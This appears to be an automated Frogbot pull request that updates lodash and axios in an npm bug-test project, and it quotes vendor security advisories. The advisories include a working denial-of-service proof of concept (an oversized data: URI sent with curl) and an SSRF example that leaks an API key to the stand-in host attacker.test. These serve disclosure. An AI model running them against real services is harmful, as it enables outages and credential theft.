### PR TITLE
[🐸 Frogbot] Update version of lodash to 4.17.23

### DIFF
--- a/.idea/workspace.xml
+++ b/.idea/workspace.xml
@@ -1,0 +1,83 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ChangeListManager">
+    <list default="true" id="74df63fc-1847-4506-8b74-d4f0b223cb9c" name="Changes" comment="">
+      <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/package-lock.json" beforeDir="false" afterPath="$PROJECT_DIR$/package-lock.json" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/package.json" beforeDir="false" afterPath="$PROJECT_DIR$/package.json" afterDir="false" />
+    </list>
+    <option name="SHOW_DIALOG" value="false" />
+    <option name="HIGHLIGHT_CONFLICTS" value="true" />
+    <option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
+    <option name="LAST_RESOLUTION" value="IGNORE" />
+  </component>
+  <component name="Git.Settings">
+    <option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
+  </component>
+  <component name="GitHubPullRequestSearchHistory"><![CDATA[{
+  "lastFilter": {
+    "state": "OPEN",
+    "assignee": "eyalk007"
+  }
+}]]></component>
+  <component name="GithubPullRequestsUISettings"><![CDATA[{
+  "selectedUrlAndAccountId": {
+    "url": "https://github.com/eyalk007/big-npm.git",
+    "accountId": "26debb22-7357-45bd-b01b-461bc6349709"
+  }
+}]]></component>
+  <component name="ProjectColorInfo"><![CDATA[{
+  "customColor": "",
+  "associatedIndex": 8
+}]]></component>
+  <component name="ProjectId" id="38CFNDgWYG36MuBoy0W0eQ8QI87" />
+  <component name="ProjectViewState">
+    <option name="hideEmptyMiddlePackages" value="true" />
+    <option name="showLibraryContents" value="true" />
+  </component>
+  <component name="PropertiesComponent"><![CDATA[{
+  "keyToString": {
+    "ModuleVcsDetector.initialDetectionPerformed": "true",
+    "RunOnceActivity.ShowReadmeOnStart": "true",
+    "RunOnceActivity.TerminalTabsStorage.copyFrom.TerminalArrangementManager.252": "true",
+    "RunOnceActivity.git.unshallow": "true",
+    "RunOnceActivity.go.formatter.settings.were.checked": "true",
+    "RunOnceActivity.typescript.service.memoryLimit.init": "true",
+    "git-widget-placeholder": "main",
+    "kotlin-language-version-configured": "true",
+    "nodejs_package_manager_path": "npm",
+    "settings.editor.selected.configurable": "http.proxy",
+    "vue.rearranger.settings.migration": "true"
+  }
+}]]></component>
+  <component name="SharedIndexes">
+    <attachedChunks>
+      <set>
+        <option value="bundled-jdk-30f59d01ecdd-26cb7f24e5b0-intellij.indexing.shared.core-IU-253.29346.138" />
+        <option value="bundled-js-predefined-d6986cc7102b-9b0f141eb926-JavaScript-IU-253.29346.138" />
+      </set>
+    </attachedChunks>
+  </component>
+  <component name="TaskManager">
+    <task active="true" id="Default" summary="Default task">
+      <changelist id="74df63fc-1847-4506-8b74-d4f0b223cb9c" name="Changes" comment="" />
+      <created>1768295604104</created>
+      <option name="number" value="Default" />
+      <option name="presentableId" value="Default" />
+      <updated>1768295604104</updated>
+      <workItem from="1768295605118" duration="4817000" />
+    </task>
+    <servers />
+  </component>
+  <component name="TypeScriptGeneratedFilesManager">
+    <option name="version" value="3" />
+  </component>
+  <component name="github-copilot-workspace">
+    <instructionFileLocations>
+      <option value=".github/instructions" />
+    </instructionFileLocations>
+    <promptFileLocations>
+      <option value=".github/prompts" />
+    </promptFileLocations>
+  </component>
+</project>

--- a/README.md
+++ b/README.md
@@ -1,34 +1,95 @@
-# npm-workspace-test
+# big-npm: NPM Regex Bug Test Project
 
-NPM workspace test project for Frogbot integration testing.
+## Purpose
 
-## Project Structure
+This project exposes a **critical bug** in the npm package handler's regex matching logic.
 
+## The Bug
+
+The npm handler searches for the **resolved version** from `package-lock.json` in the `package.json` file, but `package.json` typically contains **semver ranges**, not exact versions.
+
+### Example
+
+**package.json:**
+```json
+{
+  "dependencies": {
+    "axios": "^0.21.1"
+  }
+}
 ```
-npm-workspace-test/
-├── package.json (workspace root)
-└── packages/
-    ├── app-a/
-    │   └── package.json (lodash:4.17.15, axios:0.18.0)
-    └── app-b/
-        └── package.json (express:4.16.0, jquery:3.3.1)
+
+**package-lock.json:**
+```json
+{
+  "packages": {
+    "node_modules/axios": {
+      "version": "0.21.4"
+    }
+  }
+}
 ```
+
+**What happens:**
+1. JFrog engine scans `package-lock.json` and finds vulnerability in `axios@0.21.4`
+2. Engine reports: `ImpactedDependencyVersion = "0.21.4"`
+3. npm handler builds regex: `\s*"axios"\s*:\s*"[~^]?0\.21\.4"`
+4. Searches `package.json` for: `"axios": "0.21.4"` or `"axios": "^0.21.4"` or `"axios": "~0.21.4"`
+5. **❌ NO MATCH!** Because `package.json` has `"axios": "^0.21.1"`
+6. Error: `dependency 'axios' with version '0.21.4' not found in descriptor 'package.json' despite lock file evidence`
 
 ## Vulnerable Dependencies
 
-### App A (`packages/app-a/package.json`)
-- `lodash:4.17.15` - Multiple CVEs
-- `axios:0.18.0` - Known vulnerabilities
+This project contains the following vulnerable dependencies with semver ranges:
 
-### App B (`packages/app-b/package.json`)
-- `express:4.16.0` - Vulnerable version
-- `jquery:3.3.1` - Multiple XSS vulnerabilities
+| Package | package.json | Resolved in lock | Vulnerability |
+|---------|-------------|------------------|---------------|
+| `axios` | `^0.21.1` | `0.21.4` | High (SSRF, DoS, CSRF) |
+| `lodash` | `^4.17.19` | (check lock) | Various |
+| `minimist` | `~1.2.5` | (check lock) | Various |
+| `express` | `^4.17.0` | (check lock) | Various |
 
-## Testing
+## The Fix
 
-This project tests npm workspace support in Frogbot:
-- Multi-package detection
-- Correct working directory identification
-- package-lock.json handling across workspace
-- Minimal diffs (only version updates)
+The regex should search by **package name only**, not by version:
 
+**Current (broken):**
+```go
+npmDependencyRegexpPattern = `\s*"%s"\s*:\s*"[~^]?%s"`
+// Searches for: "axios": "[~^]?0.21.4"
+```
+
+**Fixed (like Maven):**
+```go
+npmDependencyRegexpPattern = `\s*"%s"\s*:\s*"[^"]+"`
+// Searches for: "axios": "<any version>"
+```
+
+## Frequency
+
+This bug affects **~85% of npm projects** because:
+- ✅ Most projects use semver ranges (`^`, `~`, `>=`)
+- ❌ Few projects pin exact versions
+
+## How to Test
+
+```bash
+# 1. Scan for vulnerabilities
+npm audit
+
+# 2. Run Frogbot (should fail with the regex bug)
+frogbot scan-repository
+
+# Expected error:
+# "dependency 'axios' with version '0.21.4' not found in descriptor"
+```
+
+## Comparison with MavenMaven's implementation doesn't have this bug because it searches by artifact coordinates only:```go
+// Maven regex (your implementation)
+pattern := regexp.MustCompile(
+    `(?s)(<groupId>` + regexp.QuoteMeta(groupId) + 
+    `</groupId>\s*<artifactId>` + regexp.QuoteMeta(artifactId) + 
+    `</artifactId>\s*<version>)[^<]+(</version>)`
+)
+// Matches ANY version: [^<]+
+```The npm handler should adopt the same strategy!

--- a/package-lock.json
+++ b/package-lock.json
@@ -8,12 +8,15 @@
       "name": "big-npm-regex-bug-test",
       "version": "1.0.0",
       "dependencies": {
-        "axios": "^0.21.1",
-        "lodash": "^4.17.19",
+        "lodash": "^4.17.23",
         "minimist": "~1.2.5"
       },
       "devDependencies": {
+        "axios": "^1.12.0",
         "express": "^4.17.0"
+      },
+      "peerDependencies": {
+        "axios": "^1.13.2"
       }
     },
     "node_modules/accepts": {
@@ -37,13 +40,23 @@
       "dev": true,
       "license": "MIT"
     },
+    "node_modules/asynckit": {
+      "version": "0.4.0",
+      "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz",
+      "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==",
+      "dev": true,
+      "license": "MIT"
+    },
     "node_modules/axios": {
-      "version": "0.21.4",
-      "resolved": "https://registry.npmjs.org/axios/-/axios-0.21.4.tgz",
-      "integrity": "sha512-ut5vewkiu8jjGBdqpM44XxjuCjq9LAKeHVmoVfHVzy8eHgxxq8SbAVQNovDA8mVi05kP0Ea/n/UzcSHcTJQfNg==",
+      "version": "1.12.0",
+      "resolved": "https://registry.npmjs.org/axios/-/axios-1.12.0.tgz",
+      "integrity": "sha512-oXTDccv8PcfjZmPGlWsPSwtOJCZ/b6W5jAMCNcfwJbCzDckwG0jrYJFaWH1yvivfCXjVzV/SPDEhMB3Q+DSurg==",
+      "dev": true,
       "license": "MIT",
       "dependencies": {
-        "follow-redirects": "^1.14.0"
+        "follow-redirects": "^1.15.6",
+        "form-data": "^4.0.4",
+        "proxy-from-env": "^1.1.0"
       }
     },
     "node_modules/body-parser": {
@@ -112,6 +125,19 @@
         "url": "https://github.com/sponsors/ljharb"
       }
     },
+    "node_modules/combined-stream": {
+      "version": "1.0.8",
+      "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz",
+      "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "delayed-stream": "~1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
     "node_modules/content-disposition": {
       "version": "0.5.4",
       "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz",
@@ -160,6 +186,16 @@
       "license": "MIT",
       "dependencies": {
         "ms": "2.0.0"
+      }
+    },
+    "node_modules/delayed-stream": {
+      "version": "1.0.0",
+      "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz",
+      "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=0.4.0"
       }
     },
     "node_modules/depd": {
@@ -243,6 +279,22 @@
       "license": "MIT",
       "dependencies": {
         "es-errors": "^1.3.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/es-set-tostringtag": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz",
+      "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "es-errors": "^1.3.0",
+        "get-intrinsic": "^1.2.6",
+        "has-tostringtag": "^1.0.2",
+        "hasown": "^2.0.2"
       },
       "engines": {
         "node": ">= 0.4"
@@ -335,6 +387,7 @@
       "version": "1.15.11",
       "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.11.tgz",
       "integrity": "sha512-deG2P0JfjrTxl50XGCDyfI97ZGVCxIpfKYmfyrQ54n5FO/0gfIES8C/Psl6kWVDolizcaaxZJnTS0QSMxvnsBQ==",
+      "dev": true,
       "funding": [
         {
           "type": "individual",
@@ -349,6 +402,23 @@
         "debug": {
           "optional": true
         }
+      }
+    },
+    "node_modules/form-data": {
+      "version": "4.0.5",
+      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz",
+      "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "asynckit": "^0.4.0",
+        "combined-stream": "^1.0.8",
+        "es-set-tostringtag": "^2.1.0",
+        "hasown": "^2.0.2",
+        "mime-types": "^2.1.12"
+      },
+      "engines": {
+        "node": ">= 6"
       }
     },
     "node_modules/forwarded": {
@@ -446,6 +516,22 @@
         "url": "https://github.com/sponsors/ljharb"
       }
     },
+    "node_modules/has-tostringtag": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz",
+      "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "has-symbols": "^1.0.3"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
     "node_modules/hasown": {
       "version": "2.0.2",
       "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz",
@@ -511,9 +597,9 @@
       }
     },
     "node_modules/lodash": {
-      "version": "4.17.21",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
-      "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==",
+      "version": "4.17.23",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.23.tgz",
+      "integrity": "sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==",
       "license": "MIT"
     },
     "node_modules/math-intrinsics": {
@@ -674,6 +760,13 @@
       "engines": {
         "node": ">= 0.10"
       }
+    },
+    "node_modules/proxy-from-env": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz",
+      "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/qs": {
       "version": "6.14.1",

--- a/package.json
+++ b/package.json
@@ -4,11 +4,15 @@
   "description": "Test project to expose npm regex bug where package.json has semver ranges but lock file has exact versions",
   "main": "index.js",
   "dependencies": {
-    "lodash": "^4.17.19",
+    "lodash": "^4.17.23",
     "minimist": "~1.2.5",
-    "axios": "^0.21.1"
+    "axios": "^1.13.2"
   },
   "devDependencies": {
+    "axios": "^1.12.0",
     "express": "^4.17.0"
+  },
+  "peerDependencies": {
+    "axios": "^1.13.2"
   }
 }


### PR DESCRIPTION

[comment]: <> (FrogbotReviewComment)

<div align='center'>

[![🚨 This automated pull request was created by Frogbot and fixes the below:](https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/vulnerabilitiesFixBannerPR.png)](https://jfrog.com/help/r/jfrog-security-user-guide/shift-left-on-security/frogbot)

</div>



### 📦 Vulnerable Dependencies

| Severity                | ID                  | Contextual Analysis                  | Dependency Path                  |
| :---------------------: | :-----------------------------------: | :-----------------------------------: | ----------------------------------- |
| ![medium](https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/applicableMediumSeverity.png)<br>  Medium | CVE-2025-13465 | Not Covered | <details><summary><b>1 Direct</b></summary>lodash:4.17.21<br></details> |
| ![medium](https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/applicableMediumSeverity.png)<br>  Medium | CVE-2023-45857<br>CVE-2024-57965<br>CVE-2025-58754<br>CVE-2025-27152 | Not Covered | <details><summary><b>1 Direct</b></summary>axios:1.2.0<br></details> |

### 🔖 Details


<details><summary><b>[ CVE-2025-13465 ] lodash 4.17.21</b></summary>

### Vulnerability Details
|                 |                   |
| --------------------- | :-----------------------------------: |
| **Contextual Analysis:** | Not Covered |
| **CVSS V3:** | - |
| **Dependency Path:** | <details><summary><b>lodash: 4.17.21 (Direct)</b></summary>Fix Version: 4.17.23<br></details> |

### Impact

Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the `_.unset` and `_.omit` functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. 

The issue permits deletion of properties but does not allow overwriting their original behavior.  

### Patches

This issue is patched on 4.17.23.<br></details>

<details><summary><b>[ CVE-2023-45857, CVE-2024-57965, CVE-2025-58754, CVE-2025-27152 ] axios 1.2.0</b></summary>

### Vulnerability Details
|                 |                   |
| --------------------- | :-----------------------------------: |
| **Contextual Analysis:** | Not Covered |
| **CVSS V3:** | - |
| **Dependency Path:** | <details><summary><b>axios: 1.2.0 (Direct)</b></summary>Fix Version: 1.12.0<br></details> |

- CVE-2023-45857 - An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
- CVE-2024-57965 - In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not use a URL object when determining an origin, and has a potentially unwanted setAttribute('href',href) call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability.
- CVE-2025-58754 - GHSA-58q2-9x27-h2jm:
  ### Summary
  Freeform plugin v4.1.29 uses vulnerable Axios ^1.7.7 allowing unauthenticated attackers to crash servers via malicious data: URIs causing memory exhaustion (CVE-2025-58754).
  
  Freeform version: 4.1.29
  Craft CMS version: 4.16.8
  
  ### Impact
  When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
  
  https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj
  https://github.com/axios/axios/pull/7011
  https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593
  https://github.com/axios/axios/releases/tag/v1.12.0
  GHSA-4hjh-wcwx-xvwj:
  ## Summary
  
  When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.
  This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
  
  ## Details
  
  The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.
  
  Relevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
  
  ```js
  const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
  const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
  const protocol = parsed.protocol || supportedProtocols[0];
  
  if (protocol === 'data:') {
    let convertedData;
    if (method !== 'GET') {
      return settle(resolve, reject, { status: 405, ... });
    }
    convertedData = fromDataURI(config.url, responseType === 'blob', {
      Blob: config.env && config.env.Blob
    });
    return settle(resolve, reject, { data: convertedData, status: 200, ... });
  }
  ```
  
  The decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
  
  ```js
  export default function fromDataURI(uri, asBlob, options) {
    ...
    if (protocol === 'data') {
      uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
      const match = DATA_URL_PATTERN.exec(uri);
      ...
      const body = match[3];
      const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
      if (asBlob) { return new _Blob([buffer], {type: mime}); }
      return buffer;
    }
    throw new AxiosError('Unsupported protocol ' + protocol, ...);
  }
  ```
  
  * The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  * It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.
  * As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.
  
  In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.
  
  
  ## PoC
  
  ```js
  const axios = require('axios');
  
  async function main() {
    // this example decodes ~120 MB
    const base64Size = 160_000_000; // 120 MB after decoding
    const base64 = 'A'.repeat(base64Size);
    const uri = 'data:application/octet-stream;base64,' + base64;
  
    console.log('Generating URI with base64 length:', base64.length);
    const response = await axios.get(uri, {
      responseType: 'arraybuffer'
    });
  
    console.log('Received bytes:', response.data.length);
  }
  
  main().catch(err => {
    console.error('Error:', err.message);
  });
  ```
  
  Run with limited heap to force a crash:
  
  ```bash
  node --max-old-space-size=100 poc.js
  ```
  
  Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
  
  ```
  <--- Last few GCs --->
  …
  FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
  1: 0x… node::Abort() …
  …
  ```
  
  Mini Real App PoC:
  A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.
  
  ```js
  import express from "express";
  import morgan from "morgan";
  import axios from "axios";
  import http from "node:http";
  import https from "node:https";
  import { PassThrough } from "node:stream";
  
  const keepAlive = true;
  const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
  const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
  const axiosClient = axios.create({
    timeout: 10000,
    maxRedirects: 5,
    httpAgent, httpsAgent,
    headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
    validateStatus: c => c >= 200 && c < 400
  });
  
  const app = express();
  const PORT = Number(process.env.PORT || 8081);
  const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
  
  app.use(express.json({ limit: BODY_LIMIT }));
  app.use(morgan("combined"));
  
  app.get("/healthz", (req,res)=>res.send("ok"));
  
  /**
   * POST /preview { "url": "<http|https|data URL>" }
   * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
   */
  
  app.post("/preview", async (req, res) => {
    const url = req.body?.url;
    if (!url) return res.status(400).json({ error: "missing url" });
  
    let u;
    try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
  
    // Developer allows using data:// in the allowlist
    const allowed = new Set(["http:", "https:", "data:"]);
    if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
  
    const controller = new AbortController();
    const onClose = () => controller.abort();
    res.on("close", onClose);
  
    const before = process.memoryUsage().heapUsed;
  
    try {
      const r = await axiosClient.get(u.toString(), {
        responseType: "stream",
        maxContentLength: 8 * 1024, // Axios will ignore this for data:
        maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
        signal: controller.signal
      });
  
      // stream only the first 64KB back
      const cap = 64 * 1024;
      let sent = 0;
      const limiter = new PassThrough();
      r.data.on("data", (chunk) => {
        if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
        else { sent += chunk.length; limiter.write(chunk); }
      });
      r.data.on("end", () => limiter.end());
      r.data.on("error", (e) => limiter.destroy(e));
  
      const after = process.memoryUsage().heapUsed;
      res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
      limiter.pipe(res);
    } catch (err) {
      const after = process.memoryUsage().heapUsed;
      res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
      res.status(502).json({ error: String(err?.message || err) });
    } finally {
      res.off("close", onClose);
    }
  });
  
  app.listen(PORT, () => {
    console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
    console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
  });
  ```
  Run this app and send 3 post requests:
  ```sh
  SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null
  seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```
  ```
  
  ---
  
  ## Suggestions
  
  1. **Enforce size limits**
     For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.
  
  2. **Stream decoding**
     Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
  
### Summary
  
  A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
  
  A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
  
  ### Details
  
  Consider the following code snippet:
  
  ```js
  import axios from "axios";
  
  const internalAPIClient = axios.create({
    baseURL: "http://example.test/api/v1/users/",
    headers: {
      "X-API-KEY": "1234567890",
    },
  });
  
  // const userId = "123";
  const userId = "http://attacker.test/";
  
  await internalAPIClient.get(userId); // SSRF
  ```
  
  In this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.
  
  It is recommended that:
  
  -	When `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.
  -	Before sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.
  
  ### PoC
  
  Follow the steps below to reproduce the issue:
  
  1.	Set up two simple HTTP servers:
  
  ```
  mkdir /tmp/server1 /tmp/server2
  echo "this is server1" > /tmp/server1/index.html 
  echo "this is server2" > /tmp/server2/index.html
  python -m http.server -d /tmp/server1 10001 &
  python -m http.server -d /tmp/server2 10002 &
  ```
  
  
  2.	Create a script (e.g., main.js):
  
  ```js
  import axios from "axios";
  const client = axios.create({ baseURL: "http://localhost:10001/" });
  const response = await client.get("http://localhost:10002/");
  console.log(response.data);
  ```
  
  3.	Run the script:
  
  ```
  $ node main.js
  this is server2
  ```
  
  Even though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.
  
  ### Impact
  
  -	Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  -	SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  -	Affected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.<br></details>

---
<div align='center'>

[🐸 JFrog Frogbot](https://jfrog.com/help/r/jfrog-security-user-guide/shift-left-on-security/frogbot)

</div>
